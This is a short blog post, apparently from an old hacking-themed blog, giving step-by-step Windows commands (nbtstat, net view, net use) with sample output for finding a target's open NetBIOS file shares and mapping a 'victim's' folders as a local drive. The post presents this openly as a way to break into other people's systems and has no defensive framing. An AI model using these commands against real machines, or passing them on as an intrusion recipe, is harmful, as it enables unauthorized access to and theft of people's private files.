Sign by xXx - xXx Rulez

exploit victim in 15sec  

If your victim posess certain security flaws then her system can be broken into in less that 15 seconds.


This is how : -
Click "Start -> Run -> cmd"

Type the following at the Dos Prompt
Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________

The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>.
A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this.
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)

This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.

old but try dis -:|

This entry was posted on 9:14 PM and is filed under . You can leave a response and follow any responses to this entry through the Subscribe to: Post Comments (Atom) .

0 comments

Label Cloud

Blogumulus by Roy Tanck and Amanda Fazani

Your Ad Here